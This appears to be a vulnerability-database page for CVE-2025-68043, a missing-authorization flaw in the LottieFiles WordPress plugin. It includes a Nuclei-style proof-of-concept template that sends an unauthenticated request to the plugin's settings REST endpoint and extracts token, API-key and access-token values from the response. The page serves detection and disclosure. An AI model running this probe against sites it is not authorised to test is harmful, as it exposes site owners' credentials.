CVE-2025-68043: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization

2026-04-09 LottieFiles WordPress Plugin PoC Public

Description

LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.

PoC

id: CVE-2025-68043

info:
  name: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization
  author: pussycat0x
  severity: high
  description: |
    LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.
  impact: |
    Attackers can bypass authorization to access or modify restricted resources, potentially leading to data exposure or unauthorized actions.
  remediation: |
    Update to the latest version beyond 3.0.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization
    - https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve
    - https://plugins.svn.wordpress.org/lottiefiles/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cwe-id: CWE-862
    cve-id: CVE-2025-68043
    epss-score: 0.00588
    epss-percentile: 0.4639
  metadata:
    verified: true
    max-request: 1
    vendor: lottiefiles
    product: lottiefiles
    framework: wordpress
  tags: cve,cve2025,wordpress,wp-plugin,lottiefiles,vkev

http:
  - raw:
      - |
        GET /wp-json/lottiefiles/v1/settings/ HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "is_block_logged_in"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"token"\s*:\s*"([^"]+)"'
          - '"apiKey"\s*:\s*"([^"]+)"'
          - '"accessToken"\s*:\s*"([^"]+)"'
# digest: 4a0a0047304502206f6aa6458a912279e00d5c398c73d83aed7363c58db8336687b1939e996b6d1b0221008d29f78c801a288eaba4b71b5d9c738a5efc7e4d1255f094f530b3ae40b07224:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities